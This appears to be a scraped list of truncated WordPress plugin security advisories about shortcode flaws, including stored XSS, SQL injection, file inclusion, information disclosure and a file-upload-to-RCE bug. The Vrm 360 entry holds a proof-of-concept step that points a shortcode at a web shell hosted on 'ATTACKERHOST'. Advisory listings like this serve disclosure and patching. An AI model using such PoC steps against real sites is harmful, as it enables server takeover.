WordPress SoundCloud Shortcode Plugin <= 3.1.0 is vulnerable to Cross Site Scripting (XSS)

Software SoundCloud Shortcode Type Plugin Vulnerable versions = 3.1.0 Fixed in 4.0.0 OWASP Top 10 A7: Cross-Site Scripting XSS Classification Cross Site Scripting XSS CVE CVE-2023-34018 Patch priority Low CVSS severity Low 5.9 Developer Claim ownership PSID bb0d82ac536c Credits yuyudhn Required...

PT-2023-32432 · WordPress · Medialist

Name of the Vulnerable Software and Affected Versions: Medialist WordPress plugin versions prior to 1.4.1 Description: The issue concerns the Medialist WordPress plugin, which does not properly validate and escape certain shortcode attributes before outputting them in a page or post. This could...

Video PopUp < 1.1.4 - Contributor+ Stored XSS via Shortcode

Description The plugin does not validate and escape some of its videopopup shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

Advanced Custom Fields: Extended < 0.8.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acfeform' shortcode in versions up to, and including, 0.8.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

UserPro < 5.1.2 - Sensitive Information Disclosure via Shortcode

Description The UserPro plugin for WordPress is vulnerable to sensitive information disclosure via the 'userpro' shortcode in versions up to, and including 5.1.1. This is due to insufficient restriction on sensitive user meta values that can be called via that shortcode. This makes it possible fo...

UserPro < 5.1.5 - Missing Authorization to Arbitrary Shortcode Execution via userpro_shortcode_template

Description The UserPro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'userproshortcodetemplate' function in versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to arbitrary shortcode execution. An...

Information Reel < 10.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Description The Information Reel plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible f...

Podcast Subscribe Buttons < 1.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Podcast Subscribe Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'podcastsubscribe' shortcode in versions up to, and including, 1.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for...

EasyRotator for WordPress <= 1.0.14 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The EasyRotator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easyrotator' shortcode in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it...

Sponsors <= 3.5.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Sponsors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sponsors' shortcode in all versions up to, and including, 3.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for...

Remote Content Shortcode <= 1.5 - Authenticated(Contributor+) Local File Inclusion via shortcode

Description The Remote Content Shortcode plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.5 via the plugin's shortcode. This allows authenticated attackers with contributor-level privileges and above to include and execute arbitrary files on the serve...

Theme Switcha < 3.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Theme Switcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themeswitchalist' shortcode in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible fo...

PHP to Page <= 0.3 - Authenticated (Subscriber+) Local File Inclusion to Remote Code Execution via Shortcode

Description The PHP to Page plugin for WordPress is vulnerable Local File Inclusion to Remote Code Execution in versions up to, and including, 0.3 via the 'php-to-page' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to include local file and potentially...

User Submitted Posts < 20230902 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in versions up to, and including, 20230901 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

CBX Map for Google Map & OpenStreetMap < 1.1.12 - Contributor+ Stored XSS via shortcode

Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

Simple Cloudflare Turnstile < 1.23.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Simple Cloudflare Turnstile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'gravity-simple-turnstile' shortcode in versions up to, and including, 1.23.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it...

BP Profile Shortcodes Extra < 2.5.3 - Contributor+ Stored XSS

Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...

Gift Up Gift Cards for WordPress and WooCommerce < 2.20.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Gift Up Gift Cards for WordPress and WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'giftup' shortcode in all versions up to, and including, 2.20.1 due to insufficient input sanitization and output escaping on user supplied attribute...

Modal Window < 5.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Description The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 5.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with...